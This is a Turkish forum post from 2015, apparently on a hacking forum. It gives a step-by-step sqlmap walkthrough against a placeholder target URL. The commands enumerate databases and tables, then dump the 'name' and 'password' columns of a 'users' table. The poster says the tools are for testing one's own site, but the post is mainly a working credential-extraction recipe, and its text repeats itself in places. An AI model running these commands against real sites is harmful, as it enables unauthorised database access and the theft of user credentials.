06-06-2015, 10:07 PM
Bu araçların amacı testtir. Forumları hackleyin diye paylaşmadım. Kendi sitelerinizdeki açıkları kapatın diye paylaştım hayırlı kullanımlar :)
Sağolsun zamanında S4cuRıTy EneMy diye bir abim vardı ondan öğrenmiştim çoğu şeyi. Buda onun konusu sayılrı zaten bunuda ondan öğrendim.
İlk olarak terminali açıp komutumuzu girelim.
gibi koddaki linki düzenleyip terminale yapıştıralım.
Komutu uyguladığımızda hedef sitenin db isimlerinin bulunmuş olduğunu göreceğiz.
2. komutumuzu kullanarak
Tabloları çekeceğiz veritabanından
3. komutta ise bize tablo isimlerini buldu arasından işimize yarıyacak olanı seçiyoruz benim işime yarıyan (users)
Bu komutumzda ise resimde gördüğünüz gibi sütunları buldu bizim işimize yarıyan sütünlar ise (name) ve (password) sütunları.
Aynı şekilde şifremizide son komutumuzla bulalım. ;
Sağolsun zamanında S4cuRıTy EneMy diye bir abim vardı ondan öğrenmiştim çoğu şeyi. Buda onun konusu sayılrı zaten bunuda ondan öğrendim.
İlk olarak terminali açıp komutumuzu girelim.
Kod:
Komut 1: sqlmap -u http://hedefsite.com/id.php?id=39 --dbsgibi koddaki linki düzenleyip terminale yapıştıralım.
Komutu uyguladığımızda hedef sitenin db isimlerinin bulunmuş olduğunu göreceğiz.
2. komutumuzu kullanarak
Kod:
sqlmap -u http://hedefsite.com/id.php?id=39 -D wreps_2013 --tablesTabloları çekeceğiz veritabanından
3. komutta ise bize tablo isimlerini buldu arasından işimize yarıyacak olanı seçiyoruz benim işime yarıyan (users)
Kod:
Komut 3: sqlmap -u http://hedefsite.com/id.php?id=39 -D wreps_2013 -T users --columnsBu komutumzda ise resimde gördüğünüz gibi sütunları buldu bizim işimize yarıyan sütünlar ise (name) ve (password) sütunları.
Kod:
Komut 4: sqlmap -u http://hedefsite.com/id.php?id=39 -D wreps_2013 -T users -C name --dumpAynı şekilde şifremizide son komutumuzla bulalım. ;
Kod:
Komut 4: sqlmap -u http://hedefsite.com/id.php?id=39 -D wreps_2013 -T users -C password --dumpCODL - Codeless